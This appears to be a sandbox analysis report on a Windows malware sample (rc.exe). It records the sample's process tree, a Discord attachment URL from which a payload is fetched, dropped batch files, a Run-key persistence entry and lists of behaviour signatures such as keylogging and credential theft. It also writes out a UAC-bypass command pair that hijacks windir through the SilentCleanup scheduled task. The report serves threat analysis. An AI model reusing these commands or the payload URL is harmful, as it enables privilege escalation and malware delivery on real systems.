Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 14, 2021, 4:50 p.m. | July 14, 2021, 4:59 p.m. |
-
-
rc.exe "C:\Users\test22\AppData\Local\Temp\rc.exe"
3028 -
-
-
reg.exe reg delete hkcu\Environment /v windir /f
2524 -
reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
1032 -
schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
2948
-
-
-
-
reg.exe reg delete hkcu\Environment /v windir /f
1684
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
cdn.discordapp.com | 162.159.130.233 | |
arsaxa.ac.ug | 79.134.225.25 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
section | CODE |
section | DATA |
section | BSS |
packer | BobSoft Mini Delphi -> BoB / BobSoft |
request | GET https://cdn.discordapp.com/attachments/854297276549169165/864158213217321006/Mnzbrgxuodrjpaspnuzrcxakfetqbfg |
file | C:\Users\Public\KDECO.bat |
file | C:\Users\Public\UKO.bat |
file | C:\Users\Public\Libraries\Mnzbrgx\Mnzbrgx.exe |
file | C:\Users\Public\Trast.bat |
file | C:\Users\Public\nest.bat |
cmdline | C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat |
cmdline | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread |
cmdline | reg delete hkcu\Environment /v windir /f |
cmdline | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
cmdline | reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " |
buffer | Buffer with sha1: 520d0f21a1483b4f0a21ef8ac6e7320a9650e812 |
description | rc.exe tried to sleep 13641201 seconds, actually delayed analysis time by 13641201 seconds |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Mnzbrgx | reg_value | C:\Users\Public\Libraries\xgrbznM.url |
file | C:\Users\Public\UKO.bat |